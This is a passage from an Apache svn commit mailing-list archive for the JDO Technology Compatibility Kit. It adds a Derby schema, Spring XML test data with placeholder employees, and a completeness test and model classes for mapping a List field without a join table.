+ +CREATE TABLE departments ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + EMP_OF_THE_MONTH INTEGER, + COMPANYID INTEGER, + DISCRIMINATOR VARCHAR(255), + CONSTRAINT DEPTS_COMP_FK FOREIGN KEY (COMPANYID) REFERENCES companies, + CONSTRAINT DEPTS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); + +CREATE TABLE persons ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + PERSONID INTEGER NOT NULL, + FIRSTNAME VARCHAR(32) NOT NULL, + LASTNAME VARCHAR(32) NOT NULL, + MIDDLENAME VARCHAR(32), + BIRTHDATE VARCHAR(32) NOT NULL, + DISCRIMINATOR varchar(64) NOT NULL, + HIREDATE VARCHAR(32), + WEEKLYHOURS REAL, + DEPARTMENT INTEGER, + FUNDINGDEPT INTEGER, + MANAGER INTEGER, + MENTOR INTEGER, + HRADVISOR INTEGER, + SALARY REAL, + WAGE REAL, + CONSTRAINT PERS_DEPT_FK FOREIGN KEY (DEPARTMENT) REFERENCES departments, + CONSTRAINT PERS_FUNDDEPT_FK FOREIGN KEY (FUNDINGDEPT) + REFERENCES departments, + CONSTRAINT PERS_MANAGER_FK FOREIGN KEY (MANAGER) REFERENCES persons, + CONSTRAINT PERS_MENTOR_FK FOREIGN KEY (MENTOR) REFERENCES persons, + CONSTRAINT PERS_HRADVISOR_FK FOREIGN KEY (HRADVISOR) REFERENCES persons, + CONSTRAINT PERS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); + +ALTER TABLE departments + ADD CONSTRAINT EMP_MO_FK FOREIGN KEY + (EMP_OF_THE_MONTH) REFERENCES persons(DATASTORE_IDENTITY); + Added: db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml (added) +++ db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml Tue Sep 19 15:29:56 2006 @@ -0,0 +1,136 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> + +<beans> + <description>Company instances for CompletenessTest with Map without join table</description> + + <bean id="root" class="java.util.ArrayList"> + <constructor-arg index="0"> + <list> + <ref local="company1"/> + </list> + </constructor-arg> + </bean> + + <bean id="company1" factory-bean="companyFactory" factory-method="newCompany"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>Sun Microsystems, Inc.</value></constructor-arg> + <constructor-arg index="2" type="java.util.Date"><value>11/Apr/1952</value></constructor-arg> + <property name="departments"> + <set> + <ref local="dept1"/> + <ref local="dept2"/> + </set> + </property> + </bean> + + <bean id="dept1" factory-bean="companyFactory" factory-method="newDepartment"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String" ><value>Development</value></constructor-arg> + <property name="company"><ref bean="company1"/></property> + <property name="employees"> + <list> + <ref local="emp1"/> + <ref local="emp2"/> + <ref local="emp3"/> + </list> + </property> + </bean> + + <bean id="dept2" factory-bean="companyFactory" factory-method="newDepartment"> + <constructor-arg index="0" type="long"><value>2</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String" ><value>Human Resources</value></constructor-arg> + <property name="company"><ref bean="company1"/></property> + <property name="employees"> + <list> + <ref local="emp4"/> + <ref local="emp5"/> + </list> + </property> + </bean> + + <bean id="emp1" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp1First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp1Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp1Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>10/Jun/1970</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>1/Jan/1999</value></constructor-arg> + <constructor-arg index="6" type="double"><value>60000</value></constructor-arg> + <property name="weeklyhours"><value>40</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp2" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>2</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp2First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp2Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp2Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>22/Dec/1975</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>1/Jul/2003</value></constructor-arg> + <constructor-arg index="6" type="double"><value>47000</value></constructor-arg> + <property name="weeklyhours"><value>40</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept1"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + <property name="team"> + <set> + <ref local="emp1"/> + <ref local="emp3"/> + <ref local="emp4"/> + <ref local="emp5"/> + </set> + </property> + </bean> + <bean id="emp3" factory-bean="companyFactory" factory-method="newPartTimeEmployee"> + <constructor-arg index="0" type="long"><value>3</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp3First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp3Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp3Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>5/Sep/1972</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Aug/2002</value></constructor-arg> + <constructor-arg index="6" type="double"><value>67.00</value></constructor-arg> + <property name="weeklyhours"><value>19</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept1"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp4" factory-bean="companyFactory" factory-method="newPartTimeEmployee"> + <constructor-arg index="0" type="long"><value>4</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp4First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp4Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp4Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>6/Sep/1973</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Apr/2001</value></constructor-arg> + <constructor-arg index="6" type="double"><value>37.00</value></constructor-arg> + <property name="department"><ref bean="dept2"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp5" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>5</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp5First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp5Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp5Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>5/Jul/1962</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Aug/1998</value></constructor-arg> + <constructor-arg index="6" type="double"><value>73000</value></constructor-arg> + <property name="department"><ref bean="dept2"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisees"> + <set> + <ref local="emp1"/> + <ref local="emp2"/> + <ref local="emp3"/> + <ref local="emp4"/> + </set> + </property> + </bean> + +</beans> + From [email protected] Tue Sep 19 22:30:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9073 invoked from network); 19 Sep 2006 22:30:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Sep 2006 22:30:14 -0000 Received: (qmail 21571 invoked by uid 500); 19 Sep 2006 22:30:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21560 invoked by uid 99); 19 Sep 2006 22:30:14 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Sep 2006 15:30:14 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:57093] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id CE/7D-28275-B6F60154 for <[email protected]>; Tue, 19 Sep 2006 15:30:03 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id C6F9C1A981A; Tue, 19 Sep 2006 15:30:00 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r447999 [1/2] - in /db/jdo/trunk/tck20: ./ src/conf/ src/java/org/apache/jdo/tck/mapping/ src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ src/jdo/datastoreiden... Date: Tue, 19 Sep 2006 22:29:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Tue Sep 19 15:29:56 2006 New Revision: 447999 URL: http://svn.apache.org/viewvc?view=rev&rev=447999 Log: JDO-193 Add files for mapping a List field without a join table. Also, fix a problem in jdo metadata for companyMapWithoutJoin. Added: db/jdo/trunk/tck20/src/conf/companyListWithoutJoin.conf db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestList.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactory.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryAbstractImpl.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryConcreteClass.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMClass.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMInterface.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryRegistry.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyModelReader.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema10.sql db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema10.sql db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/ db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml Modified: db/jdo/trunk/tck20/project.properties db/jdo/trunk/tck20/src/conf/configurations.list db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo Modified: db/jdo/trunk/tck20/project.properties URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/project.properties?view=diff&rev=447999&r1=447998&r2=447999 ============================================================================== --- db/jdo/trunk/tck20/project.properties (original) +++ db/jdo/trunk/tck20/project.properties Tue Sep 19 15:29:56 2006 @@ -128,6 +128,20 @@ org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/IInsurance.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Insurance.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IInsurance.java \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.java \ @@ -256,6 +270,18 @@ org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Company.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Department.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Person.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.class \ + org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.class \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.class \ @@ -383,6 +409,7 @@ org/apache/jdo/tck/api/instancecallbacks/package.jdo \ org/apache/jdo/tck/pc/company/package.jdo \ org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo \ + org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.jdo \ Added: db/jdo/trunk/tck20/src/conf/companyListWithoutJoin.conf URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/conf/companyListWithoutJoin.conf?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/conf/companyListWithoutJoin.conf (added) +++ db/jdo/trunk/tck20/src/conf/companyListWithoutJoin.conf Tue Sep 19 15:29:56 2006 @@ -0,0 +1,7 @@ +jdo.tck.description = Completeness test with companyListWithoutJoin model. +jdo.tck.mapping.companyfactory = org.apache.jdo.tck.pc.companyListWithoutJoin.CompanyFactoryPMClass +jdo.tck.testdata = org/apache/jdo/tck/pc/companyListWithoutJoin/companyListWithoutJoin.xml +jdo.tck.standarddata = +jdo.tck.mapping = 10 +jdo.tck.classes = org.apache.jdo.tck.mapping.CompletenessTestList +jdo.tck.requiredOptions = Modified: db/jdo/trunk/tck20/src/conf/configurations.list URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/conf/configurations.list?view=diff&rev=447999&r1=447998&r2=447999 ============================================================================== --- db/jdo/trunk/tck20/src/conf/configurations.list (original) +++ db/jdo/trunk/tck20/src/conf/configurations.list Tue Sep 19 15:29:56 2006 @@ -20,6 +20,7 @@ companyM-MRelationships.conf \ companyAllRelationships.conf \ companyMapWithoutJoin.conf \ + companyListWithoutJoin.conf \ companyPMClass.conf \ companyPMInterface.conf \ inheritance1.conf \ Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestList.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestList.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestList.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestList.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,128 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.mapping; + +import java.util.ArrayList; +import java.util.Iterator; +import java.util.List; + +import org.apache.jdo.tck.JDO_Test; +import org.apache.jdo.tck.pc.companyListWithoutJoin.CompanyFactoryRegistry; +import org.apache.jdo.tck.pc.companyListWithoutJoin.CompanyModelReader; +import org.apache.jdo.tck.util.BatchTestRunner; +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +//import org.springframework.beans.factory.xml.XmlBeanFactory; + +/** + *<B>Title:</B>Completeness Test List + *<BR> + *<B>Keywords:</B> mapping + *<BR> + *<B>Assertion ID:</B> A18.[not identified] + *<BR> + *<B>Assertion Description: </B> + */ + +public class CompletenessTestList extends JDO_Test { + + /** */ + private static final String ASSERTION_FAILED = + "Assertion A18-[not identified] failed: "; + + /** */ + private final boolean isTestToBePerformed = isTestToBePerformed(); + + /** */ + protected List rootOids; + + /** */ + protected final String inputFilename = System.getProperty("jdo.tck.testdata"); + + /** + * The <code>main</code> is called when the class + * is directly executed from the command line. + * @param args The arguments passed to the program. + */ + public static void main(String[] args) { + BatchTestRunner.run(CompletenessTestList.class); + } + + /** + * @see JDO_Test#localSetUp() + */ + protected void localSetUp() { + if (isTestToBePerformed) { + getPM(); + CompanyFactoryRegistry.registerFactory(pm); + CompanyModelReader reader = new CompanyModelReader(inputFilename); + addTearDownClass(reader.getTearDownClassesFromFactory()); + // persist test data + pm.currentTransaction().begin(); + List rootList = reader.getRootList(); + pm.makePersistentAll(rootList); + rootOids = new ArrayList(); + for (Iterator i = rootList.iterator(); i.hasNext(); ) { + Object pc = i.next(); + rootOids.add(pm.getObjectId(pc)); + } + pm.currentTransaction().commit(); + cleanupPM(); + } + } + + /** */ + public void test() { + if (isTestToBePerformed) { + // register the default factory + CompanyFactoryRegistry.registerFactory(); + // get new obj graph to compare persistent graph with + CompanyModelReader reader = new CompanyModelReader(inputFilename); + List rootList = reader.getRootList(); + + getPM(); + pm.currentTransaction().begin(); + // compare persisted and new + int size = rootList.size(); + StringBuffer msg = new StringBuffer(); + for (int i = 0; i < size; i++) { + DeepEquality expected = (DeepEquality) rootList.get(i); + Object oid = rootOids.get(i); + Object persisted = pm.getObjectById(oid); + EqualityHelper equalityHelper = new EqualityHelper(); + if (!expected.deepCompareFields(persisted, equalityHelper)) { + if (msg.length() > 0) { + msg.append("\n"); + } + msg.append("Expected this instance:\n " + + expected + "\n" + + "Got persistent instance:" + "\n " + + persisted + "\n" + + "Detailed list of differences follows...\n"); + msg.append(equalityHelper.getUnequalBuffer()); + } + } + pm.currentTransaction().commit(); + // fail test if at least one of the instances is not the expected one + if (msg.length() > 0) { + fail("CompletenessTestList failed; see list of failures below:", + msg.toString()); + } + } + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Company.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,331 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.io.Serializable; +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.text.SimpleDateFormat; + +import java.util.Collections; +import java.util.Comparator; +import java.util.Set; +import java.util.HashSet; +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents information about a company. + */ +public class Company + implements ICompany, Serializable, Comparable, Comparator, DeepEquality { + + private long companyid; + private String name; + private Date founded; + private transient Set departments = new HashSet(); // element type is Department + + protected static SimpleDateFormat formatter = + new SimpleDateFormat("d/MMM/yyyy"); + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public Company() {} + + /** + * Initialize the <code>Company</code> instance. + * @param companyid The company id. + * @param name The company name. + * @param founded The date the company was founded. + */ + public Company(long companyid, String name, Date founded) { + this.companyid = companyid; + this.name = name; + this.founded = founded; + } + + /** + * Get the company id. + * @return The company id. + */ + public long getCompanyid() { + return companyid; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setCompanyid(long id) { + if (this.companyid != 0) + throw new IllegalStateException("Id is already set."); + this.companyid = id; + } + + /** + * Get the name of the company. + * @return The name of the company. + */ + public String getName() { + return name; + } + + /** + * Set the name of the company. + * @param name The value to use for the name of the company. + */ + public void setName(String name) { + this.name = name; + } + + /** + * Get the date that the company was founded. + * @return The date the company was founded. + */ + public Date getFounded() { + return founded; + } + + /** + * Set the date that the company was founded. + * @param founded The date to set that the company was founded. + */ + public void setFounded(Date founded) { + this.founded = founded; + } + + /** + * Get the departments contained in the company. + * @return An unmodifiable <code>Set</code> that contains all the + * <code>Department</code>s of the company. + */ + public Set getDepartments() { + return Collections.unmodifiableSet(departments); + } + + /** + * Add a <code>Department</code> instance to the company. + * @param dept The <code>Department</code> instance to add. + */ + public void addDepartment(Department dept) { + departments.add(dept); + } + + /** + * Remove a <code>Department</code> instance from the company. + * @param dept The <code>Department</code> instance to remove. + */ + public void removeDepartment(Department dept) { + departments.remove(dept); + } + + /** + * Initialize the set of <code>Department</code>s in the company to the + * parameter. + * @param departments The set of <code>Department</code>s for the + * company. + */ + public void setDepartments(Set departments) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.departments = + (departments != null) ? new HashSet(departments) : null; + } + + /** Serialization support: initialize transient fields. */ + private void readObject(ObjectInputStream in) + throws IOException, ClassNotFoundException { + in.defaultReadObject(); + departments = new HashSet(); + } + + /** + * Returns a String representation of a <code>Company</code> object. + * @return a String representation of a <code>Company</code> object. + */ + public String toString() { + return "Company(" + getFieldRepr()+ ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(companyid); + rc.append(", name ").append(name); + rc.append(", founded ").append(formatter.format(founded)); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified Person. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + ICompany otherCompany = (ICompany)other; + String where = "Company<" + companyid + ">"; + return + helper.equals(companyid, otherCompany.getCompanyid(), where + ".companyid") & + helper.equals(name, otherCompany.getName(), where + ".name") & + helper.equals(founded, otherCompany.getFounded(), where + ".founded") & + helper.deepEquals(departments, otherCompany.getDepartments(), where + ".departments"); + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((ICompany)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((ICompany)o1, (ICompany)o2); + } + + /** + * Compares this object with the specified Company object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Company object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified Company + * object. + */ + public int compareTo(ICompany other) { + return compare(this, other); + } + + /** + * Compares its two ICompany arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first ICompany object to be compared. + * @param o2 the second ICompany object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(ICompany o1, ICompany o2) { + return EqualityHelper.compare(o1.getCompanyid(), o2.getCompanyid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof ICompany) { + return compareTo((ICompany)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)companyid; + } + + /** + * The class to be used as the application identifier + * for the <code>Company</code> class. It consists of both the company + * name and the date that the company was founded. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field is part of the identifier and should match in name + * and type with a field in the <code>Company</code> class. + */ + public long companyid; + + /** The required public no-arg constructor. */ + public Oid() { } + + /** + * Initialize the identifier. + * @param companyid The id of the company. + */ + public Oid(long companyid) { + this.companyid = companyid; + } + + public Oid(String s) { companyid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + companyid;} + + + /** */ + public boolean equals(Object obj) { + if (obj==null || !this.getClass().equals(obj.getClass())) + return false; + Oid o = (Oid) obj; + if (this.companyid != o.companyid) + return false; + return true; + } + + /** 